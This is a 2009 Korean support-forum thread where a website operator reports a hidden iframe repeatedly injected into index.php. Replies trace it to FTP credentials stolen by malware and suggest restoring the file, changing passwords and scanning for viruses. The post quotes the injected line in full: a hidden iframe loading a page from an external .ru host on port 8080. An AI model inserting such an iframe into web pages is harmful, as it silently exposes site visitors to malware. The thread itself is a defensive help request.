묻고답하기
index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
2009.09.17 00:18
안녕하세요?
제목 그대로 index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
먼저 index.php 의 내용 가장 아래 쪽에 아래와 같은 소스가 저도 모르게 삽입된 것을 확인했습니다.
<div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=195 height=255 ></iframe></div>
이상하게 사이트 운영자인 제 컴퓨터에서는 정상적으로 접속이 되는데
다른 회원님들의 컴퓨터에서는 사이트 접속이 안 된다는 연락이 오더군요.
그래서 index.php 파일을 원본 파일로 교체하니 정상적인 접속이 되었습니다.
그런데 3일 연속으로 index.php 파일에 저 소스가 저절로 삽입이 되는군요.
이게 해킹되어서 그런 것인지 잘 모르겠습니다.
구글에서 저 소스를 검색해보니 2시간 전에 올라온 해외의 내용이 검색이 되더군요. 영어가 아니라서 해석은 못 했습니다.
http://www.r10.net/wordpress/459639-her-gun-iframe.html
일단 서버 회사에도 문의를 해볼 생각입니다만,
혹시 위 내용에 대해서 정보를 아시는 분이 계시다면 좀 알려주시면 고맙겠습니다. ^^
댓글 3
-
뉴클리어
2009.09.17 00:23
-
디따마니
2009.09.17 00:35
저도 그랬었는데 이유는 ftp 아이디/비번이 노출된겁니다.
ftp 아이디/비번 빼가는 악성코드에 걸린 컴퓨터에서 로그인한 순간 노출된 거지요.
수정된 파일 원래대로 복구하신 후
ftp 아이디/비번 바꾸세요
아래는 제가 올렸던 질문입니다. 참고하세요
-
RainSky
2009.09.17 00:47
먼저 위에 답변 남겨주신 분들에게 진심으로 감사의 말씀부터 전합니다.
위 질문을 남기고 나서 검색을 해보니 XE 팁 게시판에 자세한 내용이 올라와 있더군요.
http://www.xpressengine.com/18213404
조금 더 자세히 알아볼 필요가 있겠네요.
글쓴이 | 제목 | 최종 글 |
---|---|---|
XE | 공지 글 쓰기,삭제 운영방식 변경 공지 [16] | 2019.03.05 by 남기남 |
제이재희 | 인터넷 이 연결안되어있으면 blog api는 작동하지 않습니까?? | |
dufltptkd01 | DB계정 | |
뉴클리어 | Feed 기능..... [1] | 2009.09.16 by SMaker |
큰용 | 위젯스타일 더보기에 대해서 [1] | 2009.09.16 by 궁금이2 |
토종매니아 |
확장변수 입력 폼에 대하여....
[1]
![]() | 2009.09.16 by 깡왕 |
하놈~* | 회원 목록 출력하는 위젯은 없나요 [2] | 2009.09.16 by lattente |
ПЁГО |
이게 뜨는 이유가 대체 뭘까요?
[1]
![]() | 2009.09.16 by 뉴클리어 |
치노805 | 웹페이지 스크랩 하면 이미지가 깨지는 이유? [1] | 2009.09.16 by 뉴클리어 |
분홍곰 | 1차메뉴 글씨가 이미지로 대체가 안됩니다 | |
초보에요^^* |
스크립트로 border 모서리 둥글게 처리하는 방법좀 알려주세요.
![]() | |
이현근237 | 텍스타일 설정시 | |
백곰돌이 |
XE 블로그 RSS 를 읽어 올 수 없다고 해서요. 문제점
[1]
![]() | 2009.09.16 by 백곰돌이 |
토마토881 | php 수정하기.. [1] | 2009.09.16 by 궁금이2 |
아이유홀릭 | 최근 갤러리 위젯에서 첨부하지 않은 이미지 썸네일로 [1] | 2009.09.16 by 백성찬 |
Sooool | 외부에서 접속이 되질 않아요~ [4] | 2009.09.17 by 삽질아저씨 |
고딩어 | 게시판형태를 웹진형태로 바꾸면 화면오류 [2] | 2009.09.17 by 궁금이2 |
청개굴이 |
페이지에서 글직접작성후 저장하면 이런 오류가 뜨면서 저장이 안되는데..
[2]
![]() | 2009.09.17 by 뉴클리어 |
호시카라 | 로그인할때 특정 프레임을 새로고침시키고싶습니다. [1] | 2009.09.17 by 뉴클리어 |
RainSky | index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다. [3] | 2009.09.17 by RainSky |
주인장_안씨 | ''웹주소/xe/home''로 할때 안되네요. [4] | 2009.09.17 by 주인장_안씨 |
안녕하세요.
저도 인터넷 막 뒤집다 보니까.
신종바이러스 아이프레임 이라네요.
~~~~.ru , cn 도메인의 8080에 Iframe 로되있으면 99.9997 % 입니다. ( 0.0003% 로 안그럴수만 있으면. )
바이러스 백신을 켜서 정밀검사를 해보세요.
이 외에는 ...